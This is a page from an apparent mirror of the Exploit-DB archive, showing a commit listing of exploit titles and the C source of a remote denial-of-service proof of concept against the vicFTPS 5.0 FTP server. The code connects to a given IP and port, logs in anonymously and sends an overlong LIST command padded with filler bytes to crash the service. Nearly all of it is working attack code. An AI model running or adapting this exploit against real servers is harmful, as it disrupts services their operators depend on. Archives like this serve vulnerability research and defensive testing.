bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/windows/dos/6834.c
Offensive Security 477bcbdcc0 DB: 2016-03-17 
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

88 lines
3 KiB
C
Executable file
Raw Blame History

#include <cstdio>
#include <winsock2.h>
#include <memory.h>
#define __z00ro(a) memset(a,0,sizeof(a));
//greetings : SiD.psycho
//Smallest greetings : Gorion - lofamy cIem We want be like y0U :***
unsigned int setport(const char* port){
if((atoi(port)==0) || (atoi(port)<0)){
return 21;
}
return atoi(port);
}
int main(int argc,char **argv){
printf("++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n"
"+=========== vicFTPS v 5.0 REMOTE dos POC ;[ ===========+\n"
"+=========== Alfons Luja sp Z.0.0 ===========+\n"
"+=========== I want clear b00f not a d0s !!! ===========+\n"
"+=========== Propably 0 dAy ===========+\n"
"++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n");
if(argc<3){
printf("\nuse poc.exe IP PORT\n");
return 0;
}
int socks;
hostent *host;
WSADATA WSA;
SOCKADDR_IN aip;
char recvs[666]={0}; //ave
char test[66]={0}; // 4 nothing
const char *login = "USER Anonymous\r\n";
const char *pass = "PASS echo@gov.tr\r\n";
strcpy(test,"LIST /\\/iWana_be_like_Gorion\\");
memset(test+strlen("LIST /\\/iWana_be_like_Gorion\\"),0x42,sizeof(test));
test[sizeof(test)-2]='\r';
test[sizeof(test)-1]='\n';
test[sizeof(test)]='\0';
printf("\nTarget:%s\nPort:%u\n",argv[1],setport(argv[2]));
if((WSAStartup(MAKEWORD(4, 2), &WSA))==0){
if((socks = socket(AF_INET,SOCK_STREAM,0)) != -1){
aip.sin_family = AF_INET;
aip.sin_addr.s_addr = inet_addr(argv[1]);
aip.sin_port = htons(setport(argv[2]));
memset(&(aip.sin_zero),'0',8);
if(connect(socks,(struct sockaddr*)&aip,sizeof(struct sockaddr)) == 0){
recv(socks,recvs,sizeof(recvs)-1,0);
__z00ro(recvs);
send(socks,login,strlen(login),0);
recv(socks,recvs,sizeof(recvs)-1,0);
__z00ro(recvs);
send(socks,pass,strlen(pass),0);
recv(socks,recvs,sizeof(recvs)-1,0);
printf("%s",recvs);
if(!strncmp(recvs,"230 fake user logged in.",3)){
printf("Send greeting!!\n");
__z00ro(recvs);
send(socks,test,sizeof(test),0);
recv(socks,recvs,sizeof(recvs)-1,0);
Sleep(200);
printf("Server is charmed and died happy!!\n");
}
else{
printf("Target dont love us . You must have account :[\r\n");
closesocket(socks);
WSACleanup();
return 0;
}
}
else {
printf("(__eRROR):[Connection error](!!!!)\n"
"It can be bad port number or IP addresss!\n");
closesocket(socks);
WSACleanup();
return 0;
}
}
WSACleanup();
}
return 0;
}
//~~@KND http://pl.youtube.com/watch?v=KvFAx3ArmlE ~@~
// milw0rm.com [2008-10-24]
Reference in a new issue View git blame Copy permalink